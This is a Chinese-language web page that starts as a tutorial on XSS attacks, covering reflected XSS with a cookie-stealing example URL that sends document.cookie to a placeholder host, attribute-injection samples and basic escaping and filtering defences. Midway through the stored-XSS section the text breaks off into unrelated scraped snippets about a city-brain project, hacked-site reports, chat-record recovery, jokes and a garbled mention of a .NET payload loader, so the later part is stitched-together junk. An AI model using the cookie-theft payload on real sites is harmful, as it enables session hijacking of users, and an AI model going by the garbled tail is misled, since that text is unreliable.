XSS(cross-site scripting跨域脚本攻击)攻击是最常见的Web攻击,其重点是“跨域”和“客户端执行”。有人将XSS攻击分为三种,分别是:
1. Reflected XSS(基于反射的XSS攻击)
2. Stored XSS(基于存储的XSS攻击)
3. DOM-based or local XSS(基于DOM或本地的XSS攻击)
Reflected XSS
基于反射的XSS攻击,主要依靠站点服务端返回脚本,在客户端触发执行从而发起Web攻击。
例子:
1. 做个假设,当亚马逊在搜索书籍,搜不到书的时候显示提交的名称。
2. 在搜索框搜索内容,填入“”, 点击搜索。
3. 当前端页面没有对返回的数据进行过滤,直接显示在页面上, 这时就会alert那个字符串出来。
4. 进而可以构造获取用户cookies的地址,通过 *** 群或者垃圾邮件,来让其他人点击这个地址:
1 | http://www.amazon.cn/search?name=<script>document.location='http://xxx/get?cookie='+document.cookiescript> |
S:这个地址当然是没效的,只是举例子而已。
结论:
如果只是1、2、3步做成功,那也只是自己折腾自己而已,如果第4步能做成功,才是个像样的XSS攻击。
开发安全措施:
1. 前端在显示服务端数据时候,不仅是标签内容需要过滤、转义,就连属性值也都可能需要。
2. 后端接收请求时,验证请求是否为攻击请求,攻击则屏蔽。
例如:
标签:
1 |
转义
1 | #39;handsome boy')> |
属性:
如果一个input的value属性值是
1 | 琅琊榜" onclick="javascript:alert('handsome boy') |
就可能出现
1 | "text"value="琅琊榜"onclick="javascript:alert('handsome boy')"> |
点击input导致攻击脚本被执行,解决方式可以对script或者双引号进行过滤。
Stored XSS
基于存储的XSS攻击,是通过发表带有恶意跨域脚本的帖子/文章,从而把恶意脚本存储在服务器,每个访问该帖子/文章的人就会触发执行。
例子:
可能的攻击威力/etc/init.d/apache2 stopExchangeif ;then怎么才能向公安部举报网络赌博, 理解了ImplicitCall机制后,自然就会想到Chakra需要在可能触...
从信息化到智能化再到智慧化——城市具备用大脑思考的能力,这不是投钱就能解决的问题 杭州“大脑”究竟开了什么脑洞? ■本报见习记者 朱凌君 巩持平 ◆城市大脑最终可能要为城市生活打造一个数字化的界...
Sucuri BLOG最近发布了2019年Q2季度被黑网站趋势陈述(Website Hacked Trend Report 2019 -Q2)。这家组织的事端呼应小组和歹意程序研讨组对部分被黑站点进行...
一般情况不会的,没有那么闲工夫的黑客入侵别人窃取聊天记录玩的 只需要下一个数据恢复工具到电脑上就可以开始恢复了:首先,打开迅捷微信聊天记录恢复器。然后,数据目录选择刚才导出时所保存的文件夹,再点击“...
一、说个真的,有一年夏天我们开会没空调,大家建议比赛说凉快话,看谁能让人凉快。我说:咱们这儿怎么跟太平间似的?然后我得了个第一名。 二、有人问一位妇女:“在你与丈夫20多年的共同生活中,你觉得你们存...
21、charlie (新呈现)npm 东西包在2019年的下载次数 解决方案Nihay – 下载履行东西(C#)payload.c包含.NET程序集加载程序,该加载程序应运用Microsoft V...